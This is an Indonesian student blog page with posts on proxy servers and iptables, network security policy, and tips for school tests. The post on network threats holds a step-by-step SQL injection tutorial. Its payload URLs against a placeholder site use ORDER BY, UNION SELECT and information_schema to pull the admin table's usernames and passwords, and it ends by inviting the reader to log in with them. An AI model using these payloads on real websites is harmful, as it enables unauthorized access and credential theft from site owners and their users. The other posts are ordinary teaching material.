Recent Blog post




Proxy Server








I.          Pengertian

Proxy adalah komputer server yang berfungsi sebagai komputer lainnya untuk melakukan request terhadap konten dari Internet. Proxy bertindak sebagai gateway untuk setiap komputer klien. Web server yang menerima request dari proxy server akan menginterprestasikan request-request tersebut seolah-olah request tersebut datang langsung dari komputer klien, bukan dari komputer server. Proxy server juga dapat digunakan untuk mengamankan jaringan pribadi yang dihubungkan ke sebuah jaringan publik. Proxy server memiliki lebih banyak fungsi daripada router yang memiliki fitur packet filtering karena memang proxy server beroperasi pada level yang lebih tinggi dan memiliki kontrol yang lebih menyeluruh terhadap akses jaringan. Proxy menyediakan sumber daya baik dengan menghubungkan ke server tertentu atau dengan melayani dari cache. Dalam beberapa kasus, proxy dapat mengubah permintaan klien atau respon server untuk berbagai tujuan.


II.          Fungsi Proxy

Proxy Server merupakan pihak ketiga yang menjadi perantara antara kedua pihak yang saling berhubungan, dalam hal ini adalah jaringan lokal dan jaringan internet. Secara prinsip pihak pertama dan pihak kedua tidak langsung berhubungan, akan tetapi masing-masing berhubungan dengan pihak ketiga yaitu proxy. Tiga fungsi utama proxy server adalah:

1.      Connection sharing

Bertindak sebagai gateway yang menjadi batas antara jaringan lokal dan jaringan luar. Gateway juga bertindak sebagai titik dimana sejumlah koneksi dari pengguna lokal akan terhubung kepadanya dan koneksi jaringan luar juga terhubung kepadanya. Dengan demikian koneksi dari jaringan lokal ke internet akan menggunakan sambungan yang dimiliki oleh gateway secara bersama-sama (connecion sharing).

2.      Filtering

Bekerja pada layar aplikasi sehingga berfungsi sebagai Firewalll paket filtering yang digunakan untuk melindungi jaringan lokal terhadap gangguan atau serangan dari jaringan luar. Dapat dikonfigurasi untuk menolak situs web tertenu pada waktu-waktu tertentu.

3.      Caching
Proxy Server memiliki mekanisme penyimpanan obyek-obyek yang sudah diminta dari server-server di internet. Mekanisme caching akan menyimpan obyek-obyek yang merupakan permintaan dari para pengguna yang di dapat dari internet.


III.       Manfaat Proxy

1.      Meningkatkan kinerja jaringan

Dengan kemampuan server proxy untuk menyimpan data permintaan dari aplikasi client, permintaan yang sama dengan permintaan sebelumnya hanya akan diambilkan dari simpanan server proxy. Jika seorang pengguna internet sudah pernah membuka situs yang sama, tidak perlu dihubungkan langsung pada situs sumbernya, tetapi cukup diambilkan dari simpanan server proxy. Dengan cara demikian, koneksi langsung pada server sumbernya dapat dikurangi. Dengan demikian, penggunaan bandwidth internet untuk koneksi langsung menjadi berkurang.



2.      Filter permintaan

Server proxy juga dapat digunakan sebagai filter terhadap permintaan data dari suatu situs. Dalam hal ini, server proxy menjadi filter terhadap situs yang boleh atau tidak boleh dikunjungi. Selain itu, server proxy juga dapat sebagai filter terhadap aplikasi client yang dapat menggunakan akses terhadap internet. Dalam hal ini server proxy berlaku sebagai filter terhadap gangguan internet.

IV.           Cara kerja Proxy

Proxy server memberi batas yang jelas antara jaringan lokal dan jaringan luar (internet). Prosesnya dengan mengubah alamat IP jaringan lokal, membuat pemetaan dari alamat IP jaringan lokal menuju suatu alamat IP proxy, IP proxy digunakan untuk berhubungan dengan jaringan luar (internet).

V.            Kelebihan dan kekurangan Proxy

·         Kelebihan proxy server dalam suatu jaringan TCP/IP adalah:

1.     Keamanan jaringan lebih terjaga, karena adanya proxy sebagai pembatas antara jaringan lokal dan jaringan luar (internet).
2.     Pengaksesan kembali terhadap situs-situs yang telah diakses sebelumnya menjadi lebih cepat, karena pengaksesan tidak perlu ke jaringan luar (internet) melainkan ada pada direktori cache proxy.

3.     Terdapat fasilitas filtering, baik filtering pengguna, content dan waktu akses.

·         Kekurangan proxy server dalam suatu jaringan TCP/IP adalah:

1.     Pengaksesan terhadap situs yang belum pernah dibuka sebelumnya akan menjadi lebih lambat, karena client harus meminta terlebih dahulu ke pada proxy, setelah itu baru proxy yang akan meminta request dari client tersebut ke pada penyedia layanan internet.

2.     Bila proxy server terlambat melakukan update cache, maka client akan mendapatkan content yang belum update ketika melakukan request content tersebut.


  VI.       Jenis-Jenis Proxy

Ada empat jenis server proxy :

1.      Transparan Proxy

       Jenis server proxy yang mengidentifikasi dirinya sebagai server proxy dan juga membuat alamat IP asli tersedia melalui http header. Ini umumnya digunakan untuk kemampuan mereka untuk website cache dan tidak secara efektif memberikan anonimitas apapun untuk mereka yang menggunakannya. Namun, penggunaan proxy transparan akan membuat Anda terkena IP Banned. Ini transparan dalam hal alamat IP Anda terlihat publik, bukan transparan dalam istilah yang Anda tidak tahu bahwa Anda menggunakannya (sistem anda tidak secara khusus dikonfigurasi untuk menggunakannya)

2.      Anonymous Proxy

       Jenis server proxy ini mengidentifikasi dirinya sebagai server proxy, tetapi tidak membuat alamat IP yang asli tersedia. Jenis server proxy terdeteksi, tetapi memberikan anonimitas wajar bagi sebagian besar pengguna.

3.      Distorting Proxy

       Jenis server proxy ini mengidentifikasi dirinya sebagai server proxy, tetapi membuat alamat IP yang salah asli tersedia melalui http header.


4.      High Anonymous Proxy

       Jenis server proxy ini tidak mengidentifikasi dirinya sebagai server proxy dan tidak menyediakan alamat IP asli.

VI.          IP Tables

a.         Pengertian IP Tables

Iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita. Dengan kemampuan tools iptables, kita bisa melakukan banyak hal dengan iptables. Yang paling penting adalah bahwa dengan iptables ini kita bisa membuat aturan (rule), untuk arus lalulintas data. Aturan aturan itu dapat mencakup banyak hal, seperti besar data yang boleh lewat, jenis paket/datagram yang dapat diterima, mengatur trafic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.

b.        Chain

Membahas prinsip dasar firewall iptables, mengelola akses internet berdasarkan alamat IP,port aplikasi dan MAC address dibutuhkan Chain/rantai yaitu digambarkan sebagai jalur aliran data diantaranya:

1.      Input

Mengatur paket data yang memasuki firewall dari arah intranet maupun internet. kita bisa mengelolakomputer mana saja yang bisa mengakses firewall. misal: hanya komputer IP 192.168.1.100 yang bisa SSHke firewall dan yang lain tidak boleh.

2.      Output

Mengatur paket data yang keluar dari firewall ke arah intranet maupun internet. Biasanya output tidak diset,karena bisa membatasi kemampuan firewall itu sendiri.

3.      Forward

Mengatur paket data yang melintasi firewall dari arah internet ke intranet maupun sebaliknya. Policy forward paling banyak dipakai saat ini untuk mengatur koneksi internet berdasarkan port, mac address dan alamat IP Selain aturan (policy) firewall iptables juga mempunyai parameter yang disebut dengan TARGET, yaitu status yang menentukkan koneksi di iptables:

a.   Accept

Akses diterima dan diizinkan melewati firewall.

b.   Reject

Akses ditolak, koneksi dari komputer klien yang melewati firewall langsung terputus, biasanya terdapatpesan “Connection Refused”. Target Reject tidak menghabiskan bandwidth internet karena akses langsung ditolak, hal ini berbeda dengan DROP.

c.    Drop

Akses diterima tetapi paket data langsung dibuang oleh kernel, sehingga pengguna tidak mengetahui kalau koneksinya dibatasi oleh firewall, pengguna melihat seakan – akan server yang dihubungi mengalami permasalahan teknis. Pada koneksi internet yang sibuk dengan trafik tinggi Target Drop sebaiknya jangan digunakan.

d.   Snat

Berguna untuk melakukan perubahan alamat asal paket (Source Network Address Translation). Target ini hanya berlaku untuk tabel nat pada chain POSTROUTING. Jika paket pertama dari satu koneksi mengalami SNAT, paket-paket berikutnya dalam koneksi juga akan mengalaminya.

e.   Dnat

Digunakan untuk melakukan translasi alamat tujuan (Destination Network Address Translation) pada header dari paket yang memenuhi aturan match. DNAT hanya bekerja untuk tabel nat pada chain PREROUTING dan OUTPUT atau chain buatan yang dipanggil oleh chain tersebut.

f.    Masquerade

Bekerja seperti SNAT tapi tidak memerlukan source Target ini hanya bekerja untuk tabel nat pada chain POSTROUTING.

g.   Redirect

Mengalihkan paket ke komputer itu sendiri. Mengarahkan paket yang menuju suatu port tertentu untuk memasuki proxy, berguna untuk membangun transparent proxy. Misal untuk mengalihkan semua koneksi yang menuju port http untuk memasuki aplikasi http proxy seperti squid. Hanya bekerja untuk tabel nat pada chain PREROUTING dan OUTPUT atau pada chain buatan dari chain tersebut.

h.   Prerouting

Chain yang digunakan untuk keperluan perlakuan sebelum packet masuk route. Biasanya dipakai untuk proses NAT.

i.    Postrouting

Chain yang digunakan untuk keperluan perlakuan sesudah packet masuk route. Biasanya dipakai untuk proses NAT.

c.         Table

1.   Nat

Mentranslasikan (menggantikan) alamat asal atau tujuan dari sebuah paket. Contoh apabila satu buah PC Client yang beralamat IP private memberikan request agar terkoneksi ke internet dari gateway dan di terima oleh PC Router, sedangkan hanya PC Router yang memiliki alamat IP public, maka agar client dapat terkoneksi ke internet, IP private tadi ditranslasikan (digantkan) requestnya oleh PC Router dengan IP public miliknya, kemudian hasil request disambungkan kembali ke PC Client, sehingga PC Client dapat mengakses internet.

2.   Mangle

Melakukan penghalusan (mangle) paket, seperti TTL, TOS dan MARK.

3.   Filter

Menentukan paket yang akan di-DROP, LOG, ACCEPT atau REJECT.

By : Unknown
Jumat, 16 September 2016
0

Ancaman dan Serangan dalam Jaringan



Ancaman & Serangan dalam Jaringan Komputer adalah Suatu Usaha dan Kegiatan Baik dari luar ataupun dalam yang dapat membahayakan keselamatan.

Serangan dalam jaringan dibagi dalam 2 macam :

1.      Serangan Fisik.
2.      Serangan Logic.

Contoh serangan fisik :

1.      Pencurian komputer.
2.      Wiretapping.
Contoh serangan logic :

1.      SQL Injection.
2.      Malicious Code.
3.      Packet Sniffer.

SQL Injection


SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke aplikasi tersebut. Berikut cara menggunakan SQL Injection.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :

http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error.

“You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya.
Disini kita akan menggunakan perintah order by

Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*

Apa itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pakai “–“. Kalau “+” sebagai penghubung perintah.

6. Nah sampai disini langsung coba satu-satu…

http://www.target.com/berita.php?id=100+order+by+1/*
http://www.target.com/berita.php?id=100+order+by+2/*
http://www.target.com/berita.php?id=100+order+by+3/*
http://www.target.com/berita.php?id=100+order+by+4/*

Sampai muncul error

Misalkan errornya disini.

http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9”
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang tampil sekarang kita pakai UNION
Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Terus perhatikan angka berapa yang keluar.

8. Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database.

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Misalnya yang kita lihat adalah table “admin”
Nah sekarang kita lihat dulu kolomnya dengan mengganti kata “table”-nya…

Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”

Langsung saja kita lihat isinya.

Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Lalu, kita bisa lihat username dan passwordnya, selanjutnya silahkan coba login.

Gikaldi Arbiyan Septuri

XII TKJ A

Ancaman dan Serangan dalam Jaringan

By : Unknown
Kamis, 11 Agustus 2016
2
KEAMANAN JARINGAN

Keamanan jaringan adalah bentuk pencegahan atau deteksi pada hal yang bersifat gangguan dan akses tak seharusnya pada Sistem Jaringan Komputer.
Tujuan keamanan jaringan untuk mengantisipasi resiko jaringan komputer berupa bentuk ancaman fisik maupun logik baik langsung ataupun tidak langsung mengganggu aktivitas yang sedang berlangsung dalam jaringan komputer.
Kebijakan penggunaan jaringan adalah rencana atau Acuan untuk mempengaruhi dan menentukan keputusan penggunaan Jaringan.
Kebijakan organisasi adalah suatu kebijakan instansi atau lembaga dalam ruang lingkup keamanan jaringan untuk akses pada sistem jaringan di tempat tersebut. Berikut kebijakannya:

       Tata Kelola Sistem Komputer
       Pengaturan Akses Jaringan
       Manajemen Sumber Daya
       Pemeriksaan Sistem Secara Berkala
Etika menggunakan jaringan adalah suatu Penerapan Konsep benar / salah serta sikap tanggung jawab dalam menggunakan jaringan, yaitu:

       Memahami Akses Pengguna
       Memahami kualitas Sumber Daya
Kebijakan mengakses komputer yaitu Kebijakan Pengguna Dalam Mengakses Komputer. Sebagai berikut:
·       Manajemen pengguna
·       Manajemen sistem computer
·       Manajemen waktu akses




Gikaldi Arbiyan Septuri 

XII TKJ A

KEAMANAN JARINGAN

By : Unknown
Jumat, 05 Agustus 2016
0

Hal-hal yang Dilakukan Untuk Menghindari Nilai Ulangan yang Kurang Memuaskan


Hasil gambar untuk nilai ulangan konyol


Setiap materi yang siswa pelajari akan di uji pemahamannya melalui tes, baik tes tulis maupun tes lisan tergantung materi yang dipelajari. Jika siswa tidak mempersiapkannya dengan baik, maka nilai yang diperoleh siswa tersebut tidak akan sesuai dengan harapan.

Berikut ini hal yang harus Anda lakukan ketika akan ulangan. Dengan melakukan hal ini, ketika akan ulangan, Anda tidak akan mendapat nilai yang menyebalkan, dan mendapat nilai yang memuaskan serta sesuai dengan harapan Anda.

Pertama, perbanyaklah membaca materi. Membaca sangat penting untuk menambah pemasukan pengetahuan tentang materi. Usahakan membiasakan diri untuk membaca materi, baik yang akan diulangankan maupun yang tidak.

Kedua, pahami materi. Membaca saja tidak cukup, Anda juga harus paham terhadap materi yang akan diulangankan. Pemahaman tentang materi akan lebih mudah jika sering membaca materi.

Ketiga, jangan malu bertanya. Terkadang materi yang sudah Anda baca tidak semuanya Anda pahami. Untuk itu, janganlah malu untuk menanyakannya kepada teman atau Guru yang bersangkutan. Guru Anda pasti senang ketika siswanya bertanya, itu salah satu tanda bahwa apa yang disampaikannya diperhatikan.  Guru pun dapat mengetahui letak kesulitan murid dalam materi yang disampaikannya. Dengan bertanya, Anda dapat lebih memahami materi dengan penjelasan yang lebih rinci dari Guru Anda tersebut.

Keempat, persiapan yang matang. Jika Anda sudah mengetahui ada jadwal ulangan, segeralah persiapkan dengan matang. Persiapan dilakukan jauh hari sebelum ulangan. Hindari sistem kebut semalamketika akan dilakukan ulangan.Namun itu tergantung diri Anda, jika Anda lebih nyaman dengan sistem kebut semalam, maka pakailah cara itu. Tetapi dengan persiapan yang dilakukan jauh hari sebelum ulangan itu akan lebih maksimal, Anda akan lebih mudah mengingat materi karena sering dibaca, dan dipahami.

Kelima, percaya diri dan berdoa. Percaya pada diri Anda bahwa Anda bisa mengisi ulangan tanpa bantuan dari orang lain, bersikap jujur , dan isilah sesuai kemampuan Anda.  Hal yang tidak kalah penting dalam persiapan saat akan ulangan adalah berdoa. Usahakan berdoa pada awal dan akhir ulangan demi kelancaran dan hasil yang lebih memuaskan, pasrahkan semua usaha yang Anda lakukan kepada Tuhan Yang Maha Esa.

Hal-hal yang Dilakukan Untuk Menghindari Nilai Ulangan yang Kurang Memuaskan

By : Unknown
Jumat, 01 Mei 2015
0

- Copyright © TOBILSUBS - Powered by Blogger -